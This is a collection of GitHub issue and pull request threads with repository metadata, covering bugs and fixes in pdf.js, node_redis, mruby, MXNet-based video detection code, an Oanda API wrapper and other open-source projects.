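layer.style.width = '612px';
layer.style.height = '792px';
document.body.append(layer);
// Only now can positions be read and elements reordered to match the visual order.
```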
2025-04-01T06:39:40.740749
2023-02-09T11:04:35
1577682635
{ "authors": [ "Snuffleupagus", "calixteman" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8715", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/16029" }
gharchive/pull-request
[api-minor] Don't print hidden annotations (bug 1815196) and correctly handle the NoView and NoPrint flags when they're changed from JS. /botio test /botio test The test bug1737260-oc was failing because the visibility of a widget is now handled in the annotation layer, hence I fixed it by adding annotations: true. Does that mean that if you use the API directly (and not the full viewer), rendering will now be "wrong" for the document? I suppose that I don't fully understand exactly why this broke and why updating the test is necessary/correct here. /botio test Does this, together with your recent patches, replace PR #15032? r=me, thank you! Yep, that's the idea; I just need to rewrite the part that updates appearances when background or border colors change.
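For context, the flags under discussion come from the annotation flag bitfield in the PDF specification (ISO 32000-1 §12.5.3); a minimal check using the standard bit values (bit positions 2, 3 and 6 give the values 2, 4 and 32), rather than pdf.js's own constants, could look like this:

```js
// Annotation flag bits from ISO 32000-1 §12.5.3.
const AnnotationFlag = { HIDDEN: 0x02, PRINT: 0x04, NOVIEW: 0x20 };

const isPrintable = (flags) =>
  (flags & AnnotationFlag.PRINT) !== 0 && (flags & AnnotationFlag.HIDDEN) === 0;
const isViewable = (flags) =>
  (flags & AnnotationFlag.NOVIEW) === 0 && (flags & AnnotationFlag.HIDDEN) === 0;

console.log(isPrintable(0x04)); // true: PRINT set, HIDDEN clear
console.log(isViewable(0x22)); // false: NOVIEW and HIDDEN set
```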
2025-04-01T06:39:40.742414
2018-05-28T20:58:33
327116317
{ "authors": [ "timvandermeij" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8716", "repo": "mozilla/pdf.js", "url": "https://github.com/mozilla/pdf.js/pull/9757" }
gharchive/pull-request
Backout of pull request #9345 Refer to https://github.com/mozilla/pdf.js/pull/9345#issuecomment-392536768. /botio-linux preview Trivial.
2025-04-01T06:39:40.762495
2015-10-12T10:28:22
110948265
{ "authors": [ "anoopvalluthadam", "sylvestre" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8717", "repo": "mozilla/relman-auto-nag", "url": "https://github.com/mozilla/relman-auto-nag/pull/24" }
gharchive/pull-request
test cases added for agents.py This is a test case for agents.py. Please let me know if this is how you want to continue with the tests; I am writing them for the other modules also. How to run:

```
project_root_folder# cd tests
project_root_folder/tests# nosetests test_agents.py
....
Ran 4 tests in 5.909s

OK
```

I cannot start it. Starting it from tests/ returns:

```
======================================================================
ERROR: Failure: ImportError (No module named bugzilla.agents)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/nose/loader.py", line 420, in loadTestsFromName
    addr.filename, addr.module)
  File "/usr/lib/python2.7/dist-packages/nose/importer.py", line 47, in importFromPath
    return self.importFromDir(dir_path, fqname)
  File "/usr/lib/python2.7/dist-packages/nose/importer.py", line 94, in importFromDir
    mod = load_module(part_fqname, fh, filename, desc)
  File "/home/sylvestre/dev/mozilla/relman-auto-nag/tests/test_agents.py", line 1, in <module>
    from bugzilla.agents import BMOAgent
ImportError: No module named bugzilla.agents
----------------------------------------------------------------------
Ran 1 test in 0.001s

FAILED (errors=1)
```

Sylvestre, I actually installed it using setup.py. If we put that in "tests", obviously we can't access modules like bugzilla unless it is in the Python path. I thought of adding separate modules for each file, which will increase the readability. If the method I am following is wrong, please do let me know; I can push it back into the root folder into a single file.
2025-04-01T06:39:40.797378
2016-07-22T19:38:51
167117023
{ "authors": [ "Mossop", "victorporof" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8718", "repo": "mozilla/tofino", "url": "https://github.com/mozilla/tofino/issues/860" }
gharchive/issue
yargs can't handle the way process.argv looks in some electron contexts. yargs assumes that process.argv is [node_path, initial_js, ...rest], so it strips the first two parts of the array and processes the rest (https://github.com/yargs/yargs/blob/master/index.js#L6). But in electron, particularly when we run as a packaged app, process.argv is actually [tofino.exe, ...rest], so we lose the first argument and this breaks events coming from squirrel's installer. :(
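One hedged workaround sketch: slice process.argv yourself before handing it to yargs, instead of letting yargs assume the two-element prefix. The process.defaultApp check is how Electron dev mode is commonly detected, and modern yargs accepts an explicit args array; verify both against the versions in use:

```js
// Packaged Electron apps have argv = [exePath, ...args], while running
// `electron .` in development gives [electronPath, appPath, ...args].
const yargs = require('yargs');

const sliceCount = process.defaultApp ? 2 : 1; // defaultApp is set by Electron in dev mode
const args = process.argv.slice(sliceCount);
const argv = yargs(args).argv; // pass the pre-sliced array explicitly
```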
2025-04-01T06:39:41.000257
2014-05-11T19:34:58
33268712
{ "authors": [ "BenHall", "BridgeAR", "bgSosh", "celesteking", "chrisbaldauf", "jbergknoff", "michelsalib", "raviv" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8719", "repo": "mranney/node_redis", "url": "https://github.com/mranney/node_redis/issues/587" }
gharchive/issue
Doesn't timeout properly when server is unreachable

```js
var r = require('redis').createClient(null, '<IP_ADDRESS>', {connect_timeout: 1000});
r.on('ready', function(){ console.log('ready!'); }).on('error', function(err){ console.log('error: ' + err)});
```

It doesn't time out after 1 second. It does time out after an unknown amount of time with: error: Error: Redis connection to <IP_ADDRESS>:6379 failed - connect ETIMEDOUT I think it should follow the docs and error out after the specified timeout.

I also got the same issue; my config is the following:

```js
var client = redis.createClient(conf.port, conf.host, {
  connect_timeout: 100, // abandon connection after 100ms
  retry_max_delay: 100, // no impact, will not wait more than 100ms between reconnection attempts
  max_attempts: 1, // only 1 connection attempt
  enable_offline_queue: false, // no offline queue, must wait for online mode
  no_ready_check: true // we don't check for redis ready state, let's query the redis directly
});
```

But instead of failing after 100ms, it fails after a full second. Anyone found a fix for that? Similar issues here. +1 +1 Any news on this? I wound up switching to ioredis, which appears to handle the connection timeouts properly and, aside from the client creation, to be a drop-in replacement for my use case. That looks interesting - I'll take a closer look, thanks. To reproduce, I paused a Redis Docker container but am still seeing long timeouts. Is this issue resolved? I experience the behavior described above. The connection fails after about 2 minutes, despite a connect_timeout of 5000. I am using version 2.2.5. @jbergknoff this should definitely be resolved. Do you have a reproducible case? And what do your current options look like? Hm, interesting. A slightly modified code snippet from the original post here reproduces the issue:

```js
var r = require('redis').createClient({host: '<IP_ADDRESS>', connect_timeout: 1000});
r.on('ready', function(){ console.log('ready!'); }).on('error', function(err){ console.log('error: ' + err)});
```

The change is in the arguments to createClient. The original snippet unintentionally falls back on the default host (<IP_ADDRESS>) because typeof null is object (https://github.com/NodeRedis/node_redis/blob/afc4989495245e683ce70a234c55046a51e73c08/index.js#L1243). If the host is the bogus <IP_ADDRESS> then this hangs for 2 minutes. If the host is <IP_ADDRESS> then it works as expected. Any insight into that? @jbergknoff thx for pointing that out! I'm looking into it right now. @jbergknoff fixed on master Great, thanks @BridgeAR! Any ETA on next release to npm? Later today
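The root cause the thread converges on is a plain JavaScript quirk that is easy to confirm in isolation, and the options-object call style from the follow-up snippet avoids it entirely:

```js
// `typeof null` is "object", so createClient(null, host, opts) treats the
// null port as an options object and silently falls back to the defaults.
console.log(typeof null); // "object"

// Passing a single options object avoids the ambiguous positional arguments.
const redis = require('redis');
const client = redis.createClient({ host: 'example-host', connect_timeout: 1000 }); // hypothetical host
client.on('error', (err) => console.log('error: ' + err));
```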
2025-04-01T06:39:41.017406
2019-12-23T15:29:20
541800429
{ "authors": [ "Jaco-JvZ", "mrchrisok", "yAnn1ck-B" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8721", "repo": "mrchrisok/OandaV20", "url": "https://github.com/mrchrisok/OandaV20/issues/14" }
gharchive/issue
Adding the specified count to the semaphore would cause it to exceed its maximum count First off, I have to say, this wrapper is great; I've been using it with great success. However, at some point I had the need to fire off these Rest20 commands as async Tasks, and I occasionally received an error in StreamSession.cs mentioning: Adding the specified count to the semaphore would cause it to exceed its maximum count I recognize these errors from when the database context of Entity Framework has not been properly disposed. However, in this case there is no database context, so I am very curious as to what the reason could be and how I can fix it. Hi yAnn1ck, First: The OandaV20 code and repo are no longer supported. Please migrate to OandaV20.2. Second: The Semaphore class is not used within the OkonkwoOandaV20 library. Any issue(s) you may be experiencing may be due to your code or environment. That said, the Semaphore class is used in the sample app, OkonkwoOandaV20App. It is also used in the test project, OkonkwoOandaV20Test. In both cases, the semaphore usage was inelegant and not intended for production. Please refer to the Microsoft docs at the link below on the Semaphore class for detailed information on its proper use. If you need further assistance, please provide a code snippet. Thanks, Chris Good day mrchrisok, Can you possibly indicate where OandaV20.2 can be found? I would like to migrate, but I don't know where to find this repo.... Regards, JvZ OANDAV20.2 is available here: https://github.com/mrchrisok/OandaV20.2
2025-04-01T06:39:41.099905
2023-04-15T21:29:47
1669580431
{ "authors": [ "holisticagile", "scottshanafelt" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8722", "repo": "mrene/minidsp-rs", "url": "https://github.com/mrene/minidsp-rs/issues/568" }
gharchive/issue
Check with DeviceControl Software Update Hey, did anybody check compatibility with the new Device Control software from miniDSP? Would love to clarify before updating and breaking the connection for minidsp-rs. Thanks! I think you are referring to Device Console? I did upgrade my SHD to that latest firmware. While minidsp-rs works in every way I've tried with it, the ability for Device Console to "tunnel" through minidsp-rs directly to the SHD does not work. Device Console throws some error when I attempt to connect. The miniDSP Android app does continue to work. Ok, cool. Thank you for your reply. I would not like to lose the ability to control my miniDSP via the API. :)
2025-04-01T06:39:41.183864
2024-02-05T16:52:35
2119016708
{ "authors": [ "JobMoll", "deandreamatias", "mrrhak" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8723", "repo": "mrrhak/icons_launcher", "url": "https://github.com/mrrhak/icons_launcher/issues/48" }
gharchive/issue
[FEATURE REQUEST] add support for notification icons :speech_balloon: Description It would be awesome if this package also generated the icons for notifications. :question: Platform This would be for Android. Duplicate of #29 I have added Android notification icon support in release v3.0.0-beta.1
2025-04-01T06:39:41.189167
2017-04-30T03:12:57
225300897
{ "authors": [ "Asmod4n", "beoran", "chasonr", "torsakch" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8724", "repo": "mruby/mruby", "url": "https://github.com/mruby/mruby/issues/3646" }
gharchive/issue
Does it have BigDecimal in mruby? I found that in some circumstances I need a highly precise decimal type for calculation. So does mruby support BigDecimal, or are there mruby gems to support that? Thanks!! If not, what should I do to achieve that? There is a gem to add bignum support: https://github.com/chasonr/mruby-gmp-bignum/ or https://github.com/chasonr/mruby-bignum/ Read the readme on how to use it, because it either needs a forked mruby version or you have to use special functions to do math on them. @Asmod4n Thank you very much. However, as I understand it, the gem does not support BigDecimal. For example, if I want "123456789.123456789 + 123456789.123456789", it should be "246913578.246913578". But for now I got "246913578.246913". Am I correct? If you want to use + - * / you have to read the readme of the gem. It should work with 123456789.123456789.to_bn + 123456789.123456789, but I haven't used those gems yet. Since there are external mrbgems to implement bignum, and the ISO standard does not require bignum, I suggest we close this issue as wontfix. Just to clarify: the Bignum gems implement integer arithmetic, not decimal floating point as torsakch seems to want. They could be used as a basis for a BigDecimal class, but they do not provide BigDecimal themselves.
2025-04-01T06:39:41.198825
2023-05-21T06:49:16
1718392240
{ "authors": [ "Chococoin", "msaebi031" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8725", "repo": "msaebi031/i18n-telegraf", "url": "https://github.com/msaebi031/i18n-telegraf/issues/1" }
gharchive/issue
Issue with implementing ctx.i18n.t("...") in Telegraf's "scenes" Hello, Thank you for your contribution. I am currently exploring how to make ctx.i18n.t("...") work in Telegraf's "scenes", and I'm encountering some difficulties. I would appreciate any assistance or guidance on this matter. Could you please provide more information on how to effectively implement ctx.i18n.t("...") into "scenes" in Telegraf? Any examples or code snippets demonstrating the correct usage would be greatly appreciated. Additionally, if there are any specific configurations or dependencies that need to be considered, please let me know. Thank you in advance for your help. I'm eager to resolve this issue and make progress with my project. Best regards, Germán Lugo Hello, use it the same way as in the examples given; it does not require any special affiliation. But if you need more help, contact me on Telegram: t.me/Target_Designer Hi msaebi031, Thank you for your quick response. I have found a solution. Inside the Scene file: ctx.reply(ctx.scene.ctx.i18n.t("test")) The trouble may be because I'm exporting the Scenes from a subfolder. Best regards.
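A minimal sketch of the reporter's workaround inside a scene module; the scene id, translation key, and file layout are hypothetical, and ctx.scene.ctx is used exactly as reported above rather than as documented Telegraf API, so treat it as unverified:

```js
// scenes/testScene.js: hypothetical scene exported from a subfolder.
const { Scenes } = require('telegraf');

const testScene = new Scenes.BaseScene('test-scene'); // hypothetical scene id

testScene.enter((ctx) => {
  // Workaround reported above: reach i18n through the outer scene context.
  ctx.reply(ctx.scene.ctx.i18n.t('test')); // 'test' is a hypothetical key
});

module.exports = testScene;
```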
2025-04-01T06:39:41.236649
2024-10-17T22:51:51
2595925036
{ "authors": [ "shodimaggio" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8727", "repo": "msiplab/TanSacNet", "url": "https://github.com/msiplab/TanSacNet/issues/9" }
gharchive/issue
Sequential processing dRi = fcn_singleOrthonormalMatrixGeneration(angles,mus,partial_difference=True,index_pd_angle=iAngle) # TODO: Sequential processing https://github.com/msiplab/TanSacNet/blob/fda9ca7f20ca0420b7f480b7d2da8de93a4a289c/code/appendix/torch_tansacnet/orthonormalTransform.py#L367 Refactoring the backward method of GivensRotaitons4Synthesizer in orthonormalTransform.py to reflect the sequential differential calculation process.
2025-04-01T06:39:41.264874
2018-12-21T21:04:17
393590326
{ "authors": [ "VSC-Service-Account", "laschultz" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8728", "repo": "mspnp/architecture-center", "url": "https://github.com/mspnp/architecture-center/pull/1114" }
gharchive/pull-request
Complete copy edit pass. @rotycenh

OPS Build status updates of commit c158ee4: :clock10: Preparing: average preparing time is 45 sec(s)

OPS Build status updates of commit c158ee4: :clock10: Incremental building: average incremental building time is 23 sec(s)

OPS Build status updates of commit c158ee4: :warning: Validation status: warnings

| File | Status | Preview URL | Details |
| --- | --- | --- | --- |
| toc.json | :warning:Warning | | Details |
| bread/toc.json | :warning:Warning | | Details |
| building-blocks/extending-templates/toc.json | :warning:Warning | | Details |
| docs/cloud-adoption/infrastructure/logs-and-reporting/overview.md | :white_check_mark:Succeeded | View | |

toc.json [Warning] Error happen when converting toc.json to Pdf. Details: Could not find file 'T:\azwh\toc.json'.
bread/toc.json [Warning] Error happen when converting bread/toc.json to Pdf. Details: Could not find a part of the path 'T:\azwh\bread\toc.json'.
building-blocks/extending-templates/toc.json [Warning] Error happen when converting building-blocks/extending-templates/toc.json to Pdf. Details: Could not find a part of the path 'T:\azwh\building-blocks\extending-templates\toc.json'.

For more details, please refer to the build report. Note: If you changed an existing file name or deleted a file, broken links in other files to the deleted or renamed file are listed only in the full build report.
2025-04-01T06:39:41.269791
2017-12-29T22:01:10
285161272
{ "authors": [ "bennage", "joakimhellum-in" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8729", "repo": "mspnp/architecture-center", "url": "https://github.com/mspnp/architecture-center/pull/342" }
gharchive/pull-request
naming conventions: change 3-letter suffix for Data Lake Store from 'dtl' to 'dls' Dear all, could you please consider whether it makes sense to change the 3-letter suffix for Data Lake Store from 'dtl' to 'dls'. The justification is that other tools already use the 'dls' abbreviation (such as the Azure CLI). Also, 'dls' seems to be appropriate for the resource type 'Microsoft.DataLakeStore'. Ref. 5fe63d8. Thanks (and sorry about the messy PRs). FYI: 'dtl' is a widely used abbreviation for DevTestLab; even some templates in the azure-quickstart-templates repo use it (even though 'lab' is perhaps a better abbreviation for DevTestLab).

:white_check_mark: Validation status: passed

| File | Status | Preview URL | Details |
| --- | --- | --- | --- |
| docs/best-practices/naming-conventions.md | :white_check_mark:Succeeded | View | |

For more details, please refer to the build report. Note: If you changed an existing file name or deleted a file, broken links in other files to the deleted or renamed file are listed only in the full build report.
2025-04-01T06:39:41.284064
2017-09-20T03:02:50
259025125
{ "authors": [ "mornfairy", "xuwentang", "yljylj" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8730", "repo": "msracver/Deep-Feature-Flow", "url": "https://github.com/msracver/Deep-Feature-Flow/issues/32" }
gharchive/issue
Shape error occurs when running the experiment

```
[09:38:23] /home/pdl/workspace2/ylj/MXNet/mxnet/dmlc-core/include/dmlc/logging.h:308: [09:38:23] src/operator/batch_norm-inl.h:238: Check failed: channelAxis < dshape.ndim() (1 vs. 0) Channel axis out of range: 1

Stack trace returned 10 entries:
[bt] (0) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN4dmlc15LogMessageFatalD1Ev+0x3c) [0x7fd8fec99aac]
[bt] (1) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZNK5mxnet2op13BatchNormProp10InferShapeEPSt6vectorIN4nnvm6TShapeESaIS4_EES7_S7_+0x979) [0x7fd8ffbab989]
[bt] (2) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x16979e7) [0x7fd8ffb719e7]
[bt] (3) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x152be47) [0x7fd8ffa05e47]
[bt] (4) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN5mxnet4exec10InferShapeEN4nnvm5GraphESt6vectorINS1_6TShapeESaIS4_EERKSs+0x83b) [0x7fd8ffa07afb]
[bt] (5) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(MXSymbolInferShape+0x17ed) [0x7fd8ff99f62d]
[bt] (6) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call_unix64+0x4c) [0x7fd90e97857c]
[bt] (7) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call+0x1f5) [0x7fd90e977cd5]
[bt] (8) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(_ctypes_callproc+0x3e6) [0x7fd90e96f376]
[bt] (9) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(+0x9db3) [0x7fd90e966db3]

infer_shape error. Arguments:
data: (1L, 3L, 562L, 1000L)
label: (1L, 20412L)
bbox_target: (1L, 36L, 36L, 63L)
bbox_weight: (1L, 36L, 36L, 63L)

Traceback (most recent call last):
  File "dff_rfcn_end2end_train_test.py", line 19, in <module>
    train_end2end.main()
  File "../../dff_rfcn/train_end2end.py", line 182, in main
    config['TRAIN']['begin_epoch'], config['TRAIN']['end_epoch'], config['TRAIN']['lr'], config['TRAIN']['lr_step'])
  File "../../dff_rfcn/train_end2end.py", line 101, in train_net
    sym_instance.infer_shape(data_shape_dict)
  File "../../dff_rfcn/../lib/utils/symbol.py", line 38, in infer_shape
    arg_shape, out_shape, aux_shape = self.sym.infer_shape(**data_shape_dict)
  File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/symbol/symbol.py", line 958, in infer_shape
    res = self._infer_shape_impl(False, *args, **kwargs)
  File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/symbol/symbol.py", line 1087, in _infer_shape_impl
    ctypes.byref(complete)))
  File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/base.py", line 143, in check_call
    raise MXNetError(py_str(_LIB.MXGetLastError()))
mxnet.base.MXNetError: Error in operator bn_conv1: [09:38:23] src/operator/batch_norm-inl.h:238: Check failed: channelAxis < dshape.ndim() (1 vs. 0) Channel axis out of range: 1

Stack trace returned 10 entries:
[bt] (0) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN4dmlc15LogMessageFatalD1Ev+0x3c) [0x7fd8fec99aac]
[bt] (1) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZNK5mxnet2op13BatchNormProp10InferShapeEPSt6vectorIN4nnvm6TShapeESaIS4_EES7_S7_+0x979) [0x7fd8ffbab989]
[bt] (2) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x16979e7) [0x7fd8ffb719e7]
[bt] (3) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x152be47) [0x7fd8ffa05e47]
[bt] (4) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN5mxnet4exec10InferShapeEN4nnvm5GraphESt6vectorINS1_6TShapeESaIS4_EERKSs+0x83b) [0x7fd8ffa07afb]
[bt] (5) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(MXSymbolInferShape+0x17ed) [0x7fd8ff99f62d]
[bt] (6) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call_unix64+0x4c) [0x7fd90e97857c]
[bt] (7) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call+0x1f5) [0x7fd90e977cd5]
[bt] (8) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(_ctypes_callproc+0x3e6) [0x7fd90e96f376]
[bt] (9) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(+0x9db3) [0x7fd90e966db3]
```

It seems like something is wrong with the image shape, but I don't know how to solve it. Help, please! Hello, I haven't downloaded DET and VID; can you share them? Thank you. http://bvisionweb1.cs.unc.edu/ilsvrc2015/download-videos-3j16.php#vid
2025-04-01T06:39:41.285444
2017-05-27T01:09:37
231764180
{ "authors": [ "realwecan", "rnunziata" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8731", "repo": "msracver/FCIS", "url": "https://github.com/msracver/FCIS/issues/16" }
gharchive/issue
Illegal memory access with gpu_mask_voting It seems to me that for some images, gpu_mask_voting causes illegal memory access (the problem still exists after the latest fix on mask merge). This problem will go away if we use cpu_mask_voting instead. I have also encountered this...thanks for solution.